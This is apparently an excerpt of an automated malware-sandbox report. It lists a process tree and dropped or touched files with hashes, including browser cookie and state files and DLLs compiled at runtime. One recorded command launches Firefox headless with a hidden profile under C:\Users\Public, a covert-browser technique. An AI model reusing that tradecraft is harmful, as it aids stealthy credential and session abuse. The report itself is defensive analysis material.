                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --force-high-res-timeticks=disabled --always-read-main-dll --metrics-shmem-handle=4500,i,10298756691630075790,8374895865258825516,524288 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=6344 /prefetch:14
                                                                                        3⤵
                                                                                          PID:2256
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -headless -no-remote -profile "C:\Users\Public\.ff_tmp"
                                                                                        2⤵
                                                                                          PID:4496
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -headless -no-remote -profile C:\Users\Public\.ff_tmp
                                                                                            3⤵
                                                                                            • Checks processor information in registry
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:2332
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2796 -prefsLen 24445 -prefMapHandle 2800 -prefMapSize 268500 -ipcHandle 2900 -initialChannelId {1431346f-cd2b-4ea0-996d-39bb376fcc12} -parentPid 2332 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2332" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 socket
                                                                                              4⤵
                                                                                                PID:3340
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1668 -prefsLen 24610 -prefMapHandle 1808 -prefMapSize 268500 -jsInitHandle 1952 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2020 -initialChannelId {fec45641-9694-45bb-b3fb-595b3fad4d34} -parentPid 2332 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2332" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 tab
                                                                                                4⤵
                                                                                                • Checks processor information in registry
                                                                                                PID:4180
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3752 -prefsLen 25493 -prefMapHandle 3756 -prefMapSize 268500 -ipcHandle 1304 -initialChannelId {48828a77-843f-4c5e-ba32-d7a75dd1ff62} -parentPid 2332 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2332" -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 rdd
                                                                                                4⤵
                                                                                                  PID:4100
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3688 -prefsLen 25542 -prefMapHandle 3684 -prefMapSize 268500 -jsInitHandle 3680 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3672 -initialChannelId {33b959a8-62f9-4cd3-9bb4-ee2a3a6c81f4} -parentPid 2332 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2332" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 tab
                                                                                                  4⤵
                                                                                                  • Checks processor information in registry
                                                                                                  PID:1708
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 3828 -prefsLen 36486 -prefMapHandle 4912 -prefMapSize 268500 -ipcHandle 2000 -initialChannelId {7b22081c-8ddf-4ea5-8b80-43a4094f77f5} -parentPid 2332 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2332" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 utility
                                                                                                  4⤵
                                                                                                  • Checks processor information in registry
                                                                                                  PID:3308
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5064 -prefsLen 34446 -prefMapHandle 5068 -prefMapSize 268500 -jsInitHandle 5072 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5076 -initialChannelId {f64629f0-602f-43de-9eb6-b5e2c94cf95a} -parentPid 2332 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2332" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 tab
                                                                                                  4⤵
                                                                                                  • Checks processor information in registry
                                                                                                  PID:2268
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5104 -prefsLen 34446 -prefMapHandle 5124 -prefMapSize 268500 -jsInitHandle 5128 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5136 -initialChannelId {8604acad-43a9-4b76-9243-fa3345942cb2} -parentPid 2332 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2332" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                  4⤵
                                                                                                  • Checks processor information in registry
                                                                                                  PID:5872
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5472 -prefsLen 34446 -prefMapHandle 5468 -prefMapSize 268500 -jsInitHandle 5464 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5456 -initialChannelId {4638822b-2372-4315-b47b-1287aa70ebd8} -parentPid 2332 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2332" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                  4⤵
                                                                                                  • Checks processor information in registry
                                                                                                  PID:4048
                                                                                          • C:\Program Files\Google\Chrome\Application\140.0.7339.81\elevation_service.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\140.0.7339.81\elevation_service.exe"
                                                                                            1⤵
                                                                                              PID:6064
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                              1⤵
                                                                                                PID:5864
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:752
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\139.0.3405.125\elevation_service.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\139.0.3405.125\elevation_service.exe"
                                                                                                1⤵
                                                                                                  PID:1572
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  1⤵
                                                                                                    PID:5912
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                                                    1⤵
                                                                                                      PID:2504
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k GPSvcGroup
                                                                                                      1⤵
                                                                                                        PID:480

                                                                                                      Network

                                                                                                            MITRE ATT&CK Enterprise v16

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            update-config.json

                                                                                                            • Path C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\update-config.json
                                                                                                            • Size 102B
                                                                                                            • SHA256 ffad3b0fb11fc38ea243bf3f73e27a6034860709b39bf251ef3eca53d4c3afda
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            BookmarkMergedSurfaceOrdering

                                                                                                            • Path C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BookmarkMergedSurfaceOrdering
                                                                                                            • Size 6B
                                                                                                            • SHA256 4489f9e3e454748b3521eb214e0a5694d562cff3d9ff511cb456953c8f534c00
                                                                                                            • MD5 SHA1 SHA512

                                                                                                            messages.json

                                                                                                            • Path C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en\messages.json
                                                                                                            • Size 593B
                                                                                                            • SHA256 92f1246c21dd5fd7266ebfd65798c61e403d01a816cc3cf780db5c8aa2e3d9c9
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            CURRENT

                                                                                                            • Path C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\CURRENT
                                                                                                            • Size 16B
                                                                                                            • SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
                                                                                                            • MD5 SHA1 SHA512

                                                                                                            SCT Auditing Pending Reports

                                                                                                            • Path C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                                                                                            • Size 2B
                                                                                                            • SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
                                                                                                            • MD5 SHA1 SHA512

                                                                                                            Local State

                                                                                                            • Path C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                                                            • Size 4KB
                                                                                                            • SHA256 d52c116d35c7458d7ae2ecd657da8148738b22617a491caa4df0352dba894835
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            blocklist

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist
                                                                                                            • Size 105KB
                                                                                                            • SHA256 33216cc8094343b1e673d6d0ce51864cf882b00961e3411c47b6a0cf1488a291
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            settings.dat

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                            • Size 280B
                                                                                                            • SHA256 a201096456be1e380b7687844e70aa8e2d987a06740acf66db0d56e000a3b50d
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            settings.dat

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                            • Size 280B
                                                                                                            • SHA256 4123fa2cc2e73053b7602d1d53a57b01f3a6cd8872729fcd7ed66886082b1b99
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            the-real-index

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                                                                            • Size 3KB
                                                                                                            • SHA256 d8fcf593aec30388f0ea44ae1b6d2b95f5cae4eb6a3f80fb13080cc49b3eb2ca
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            the-real-index~RFe5a1a11.TMP

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe5a1a11.TMP
                                                                                                            • Size 1KB
                                                                                                            • SHA256 ddcbfdbba4da688cc0742999bd8bfacfadc9d64123acc8236bd6f1cc26a14b1b
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            SiteList-Enterprise.json

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
                                                                                                            • Size 2B
                                                                                                            • SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
                                                                                                            • MD5 SHA1 SHA512

                                                                                                            Edge Profile.ico

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
                                                                                                            • Size 70KB
                                                                                                            • SHA256 31a226211c491e1b0832d4cd3cf34d97165e24a7ce4ec655259cd188f3a2bd88
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            Cookies

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                                                                                            • Size 28KB
                                                                                                            • SHA256 a63c3dedb6097d6e78b7a28124e1e8591ad2520555faf8b4e9e9724e11f64b4e
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            Sdch Dictionaries

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
                                                                                                            • Size 40B
                                                                                                            • SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
                                                                                                            • MD5 SHA1 SHA512

                                                                                                            Preferences

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                            • Size 13KB
                                                                                                            • SHA256 f58049960fe509c54d8f129cb15d908359ba88139f9bac07fde83fb49f30beac
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            Preferences

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                            • Size 13KB
                                                                                                            • SHA256 de6bc2bfdc53a7d3b65261a514eaf0fd6ead2dfc4e221ddd82b38add8d2e628f
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            Preferences

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                            • Size 13KB
                                                                                                            • SHA256 82d47d45e65fe4b12ef4ec3048b727c3131e97c95011cd878ce00c1e9625e389
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            Secure Preferences

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
                                                                                                            • Size 29KB
                                                                                                            • SHA256 95adf9d0c0b99f4a9981b954bffee03e2718e613bf6000fec0fcc4ddfdb2f1c0
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            the-real-index

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\58329d69-6be1-4e2f-ad0a-23e3d349aa5f\index-dir\the-real-index
                                                                                                            • Size 3KB
                                                                                                            • SHA256 d3bd0c86f4d49271f4c1e0fdf8a9b243f1c508101be5f57037c63e4e4c27e44b
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            the-real-index~RFe5a222f.TMP

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\58329d69-6be1-4e2f-ad0a-23e3d349aa5f\index-dir\the-real-index~RFe5a222f.TMP
                                                                                                            • Size 48B
                                                                                                            • SHA256 eba2c38bab1975380b7d2646f2a482a1bac28f3fdbbb1b0aec73314c3e73ba0c
                                                                                                            • MD5 SHA1 SHA512

                                                                                                            the-real-index

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\ad720378-3157-4ca5-920b-a853e74af7cb\index-dir\the-real-index
                                                                                                            • Size 72B
                                                                                                            • SHA256 7bf67045769d70fe124c30e43b32370692fd6cc27183f3a004690ba527c24a8a
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            index.txt

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
                                                                                                            • Size 371B
                                                                                                            • SHA256 b5c8be12784445df160919f49f3c27bcb1758ab29ff2095094e6223c262e0768
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            index.txt

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
                                                                                                            • Size 375B
                                                                                                            • SHA256 529e8d721279db9a480093378143064b1f761b0c30c8c9b0fd295064ab82bc41
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            the-real-index

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
                                                                                                            • Size 72B
                                                                                                            • SHA256 e7b6f6422fead9d1a8d453abcdaadc1a67a2ca21a75d641f0c7dc8b663b96674
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            the-real-index~RFe5a01d6.TMP

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5a01d6.TMP
                                                                                                            • Size 48B
                                                                                                            • SHA256 7c69546d2bcbe6b7ea53c6e97a5297f0138e9b1c9105249b37bdf0d30a75e8e0
                                                                                                            • MD5 SHA1 SHA512

                                                                                                            sync_diagnostic.log

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
                                                                                                            • Size 4KB
                                                                                                            • SHA256 58fc7803cfa2a70451e4c9f9686987071fae61e4c232d59dbab577579015200b
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            Local State

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                            • Size 34KB
                                                                                                            • SHA256 bdcdb755cbb45ae9ad1632d84000daa806fb4d8de51d08d640b62619cf545ea0
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            Local State

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                            • Size 33KB
                                                                                                            • SHA256 7747b19d66d98418f6e2fa4db64fb8ff7e9959aa0c3014faaee675c80ae3981f
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            Local State

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                            • Size 37KB
                                                                                                            • SHA256 b7b43394607208257952d9a02fbe423ff4c6502e0011d4b985fd664015471dad
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            6f9f902d-98d7-447e-a3ea-77a6af18c329.tmp

                                                                                                            • Path C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\6f9f902d-98d7-447e-a3ea-77a6af18c329.tmp
                                                                                                            • Size 13B
                                                                                                            • SHA256 2771d13c637c267132afff9db67537bef95708534b79ae8d954254c4e64e4e0f
                                                                                                            • MD5 SHA1 SHA512

                                                                                                            3mj0eenm.dll

                                                                                                            • Path C:\Users\Admin\AppData\Local\Temp\3mj0eenm\3mj0eenm.dll
                                                                                                            • Size 3KB
                                                                                                            • SHA256 6c7691b2994bfe6d5dbb25e5b2e16f143e18763e0cef027771c89ea688aadd1f
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            RES3B4A.tmp

                                                                                                            • Path C:\Users\Admin\AppData\Local\Temp\RES3B4A.tmp
                                                                                                            • Size 1KB
                                                                                                            • SHA256 6d9e767eb776c4034bd8f331ab24b28da38bf90f908d54be732140a6b3860c7b
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            RES550C.tmp

                                                                                                            • Path C:\Users\Admin\AppData\Local\Temp\RES550C.tmp
                                                                                                            • Size 1KB
                                                                                                            • SHA256 01f2807838f36da76c971d448ac0fbfdf28d67614197731946b352b22e288756
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            __PSScriptPolicyTest_5eha5ipe.gyn.ps1

                                                                                                            • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5eha5ipe.gyn.ps1
                                                                                                            • Size 60B
                                                                                                            • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            dciirb3m.dll

                                                                                                            • Path C:\Users\Admin\AppData\Local\Temp\dciirb3m\dciirb3m.dll
                                                                                                            • Size 3KB
                                                                                                            • SHA256 b726972ae6808dd9f1c706452182ecb5d9414a2fc6622cb81b9d1303a6e5415b
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            remote-settings-startup-bundle-

                                                                                                            • Path C:\Users\Admin\AppData\Local\Temp\remote-settings-startup-bundle-
                                                                                                            • Size 558KB
                                                                                                            • SHA256 143a1bb964e58e8778108389a9602844b11b3c0e0b0d8add8f1881a9f1dd8ee8
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            content_new.js

                                                                                                            • Path C:\Users\Admin\AppData\Local\Temp\scoped_dir2948_2133902278\CRX_INSTALL\content_new.js
                                                                                                            • Size 10KB
                                                                                                            • SHA256 d4aa4602a1590a4b8a1bce8b8d670264c9fb532adc97a72bc10c43343650385a
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            messages.json

                                                                                                            • Path C:\Users\Admin\AppData\Local\Temp\scoped_dir3752_160384823\CRX_INSTALL\_locales\en\messages.json
                                                                                                            • Size 450B
                                                                                                            • SHA256 c0945dd5fdecab40c45361bec068d1996e6ae01196dce524266d740808f753fe
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            5E43012191E7B1F510ACD5BF039D8BF1B9A277B2

                                                                                                            • Path C:\Users\Public\.ff_tmp\cache2\entries\5E43012191E7B1F510ACD5BF039D8BF1B9A277B2
                                                                                                            • Size 16KB
                                                                                                            • SHA256 6f0452305516b222327c9970f2d350dd4a7f5a8b8d461a19ac1a7e1583b18f89
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            AABAB860D2646FDCEACF8AAC0CD412654CE5E4C0

                                                                                                            • Path C:\Users\Public\.ff_tmp\cache2\entries\AABAB860D2646FDCEACF8AAC0CD412654CE5E4C0
                                                                                                            • Size 16KB
                                                                                                            • SHA256 72586e806d500ddb5aebbce047966c2fa93528f4894d3d8c9f5f75d6721c91d8
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            data.safe.tmp

                                                                                                            • Path C:\Users\Public\.ff_tmp\datareporting\glean\db\data.safe.tmp
                                                                                                            • Size 487B
                                                                                                            • SHA256 3823b70e946b9e0f77792ad0ea47fa7d330f4ca8070ba66510ae300701fa1135
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            data.safe.tmp

                                                                                                            • Path C:\Users\Public\.ff_tmp\datareporting\glean\db\data.safe.tmp
                                                                                                            • Size 2KB
                                                                                                            • SHA256 e46ee484fd21c910f07c065007a07c616fcdd4c53bd79604aa0eb05bdb814618
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            data.safe.tmp

                                                                                                            • Path C:\Users\Public\.ff_tmp\datareporting\glean\db\data.safe.tmp
                                                                                                            • Size 2KB
                                                                                                            • SHA256 fd9c87fb75ef59975a398141741f20876c79335eca493ae762ff59db747dcd76
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            data.safe.tmp

                                                                                                            • Path C:\Users\Public\.ff_tmp\datareporting\glean\db\data.safe.tmp
                                                                                                            • Size 3KB
                                                                                                            • SHA256 5071da599d7d0d992c220d420daa188ca819ac027a9b9e924d79b51d9aa4ef4c
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            data.safe.tmp

                                                                                                            • Path C:\Users\Public\.ff_tmp\datareporting\glean\db\data.safe.tmp
                                                                                                            • Size 3KB
                                                                                                            • SHA256 62b373acd7b7564d94d6eb096c381d52e7561d48afaf53ac7c321c463b040857
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            data.safe.tmp

                                                                                                            • Path C:\Users\Public\.ff_tmp\datareporting\glean\db\data.safe.tmp
                                                                                                            • Size 5KB
                                                                                                            • SHA256 36bba47e7753dfe1cac804cac03245d37122046c593d0bdd832e2bb1b66d6d2f
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            data.safe.tmp

                                                                                                            • Path C:\Users\Public\.ff_tmp\datareporting\glean\db\data.safe.tmp
                                                                                                            • Size 5KB
                                                                                                            • SHA256 e2c25783a7f3a3beddd823898dd2830a8cb64ecba769801c789bc5c37869a340
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            data.safe.tmp

                                                                                                            • Path C:\Users\Public\.ff_tmp\datareporting\glean\db\data.safe.tmp
                                                                                                            • Size 6KB
                                                                                                            • SHA256 1b18663372a9dd1d9f9f9dcf929ba9b03b46407cd2dfe3d224410b16797a817b
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            data.safe.tmp

                                                                                                            • Path C:\Users\Public\.ff_tmp\datareporting\glean\db\data.safe.tmp
                                                                                                            • Size 5KB
                                                                                                            • SHA256 18db1c2193e2224e0c0a0f19224260f0422dfea178a6766a1221d8c6e8cc21e4
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            data.safe.tmp

                                                                                                            • Path C:\Users\Public\.ff_tmp\datareporting\glean\db\data.safe.tmp
                                                                                                            • Size 6KB
                                                                                                            • SHA256 0ce4d64c8c350de8b742f4b8747d3e879ba51d2181cc121886794e883e4dc474
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            5e8e947e-fdc4-40b5-ad7e-9fb8b6ec6098

                                                                                                            • Path C:\Users\Public\.ff_tmp\datareporting\glean\pending_pings\5e8e947e-fdc4-40b5-ad7e-9fb8b6ec6098
                                                                                                            • Size 235B
                                                                                                            • SHA256 fa17efe05260c081373a7ce9dc98bbc8d21f54f96d580811df5742a20227216f
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            8ffb3aea-6204-445b-bbe8-95e2a50c22fa

                                                                                                            • Path C:\Users\Public\.ff_tmp\datareporting\glean\pending_pings\8ffb3aea-6204-445b-bbe8-95e2a50c22fa
                                                                                                            • Size 796B
                                                                                                            • SHA256 4145238d8dd96cffbbbf0dff5dd4671317ff83a5eeeca8b46be73ea2a617aeb3
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            prefs-1.js

                                                                                                            • Path C:\Users\Public\.ff_tmp\prefs-1.js
                                                                                                            • Size 6KB
                                                                                                            • SHA256 2b64b77705936d7cf2b9aab5aef2b50f14241bc5c691cda634b56e70b4c3ed8d
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            prefs.js

                                                                                                            • Path C:\Users\Public\.ff_tmp\prefs.js
                                                                                                            • Size 5KB
                                                                                                            • SHA256 2d860ea6a1dd89a07e0017e9e3ae84c61641e87a18a49ce01a6f2c57921f19a2
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            prefs.js

                                                                                                            • Path C:\Users\Public\.ff_tmp\prefs.js
                                                                                                            • Size 1KB
                                                                                                            • SHA256 13c2489ad074d156db982341e9e88862b5ed0398324e7800e752669256dfcf19
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            asrouter.ftl

                                                                                                            • Path C:\Users\Public\.ff_tmp\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
                                                                                                            • Size 15KB
                                                                                                            • SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            3870112724rsegmnoittet-es.sqlite

                                                                                                            • Path C:\Users\Public\.ff_tmp\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                                                                                                            • Size 48KB
                                                                                                            • SHA256 2b026d36f4f2617d1d1309450e3c8b6fa9351aadd563cd557c6b36428dbc7d63
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            3870112724rsegmnoittet-es.sqlite

                                                                                                            • Path C:\Users\Public\.ff_tmp\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                                                                                                            • Size 2.5MB
                                                                                                            • SHA256 3ec87d691670a915cad43834a6019b85e5b6e29d83b241f18f68cbf02809f232
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            3870112724rsegmnoittet-es.sqlite-wal

                                                                                                            • Path C:\Users\Public\.ff_tmp\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
                                                                                                            • Size 128KB
                                                                                                            • SHA256 15bb342aa85fb18696b1dd99e219b06040150a1f2b03bc5dd5d0ae56ff886c24
                                                                                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                            3mj0eenm.0.cs

                                                                                                            • Path \??\c:\Users\Admin\AppData\Local\Temp\3mj0eenm\3mj0eenm.0.cs
                                                                                                            • Size 222B
                                                                                                            • SHA256 e07808a347b5d77b462950e43adcd8098152f82269c2619e32b9fea2cbc9029a
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            3mj0eenm.cmdline

                                                                                                            • Path \??\c:\Users\Admin\AppData\Local\Temp\3mj0eenm\3mj0eenm.cmdline
                                                                                                            • Size 369B
                                                                                                            • SHA256 003f0f2959651e65101da5d252b4e2de2234fb0ac24bf59c25990b0439a3547e
                                                                                                            • MD5 SHA1 SHA512 TLSH

                                                                                                            CSCFF19331358D449A78D6C9E33697BC36A.TMP

